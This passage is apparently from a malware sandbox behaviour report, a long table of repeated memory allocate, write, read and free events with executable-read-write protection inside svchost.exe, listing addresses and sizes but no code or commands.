| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a358, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a360, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a368, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a370, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a378, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a380, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a388, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a390, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a398, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 22 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20026, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3a0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3a8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 11 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001b, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3b0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3b8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3c0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3c8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3d0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3d8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3e0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
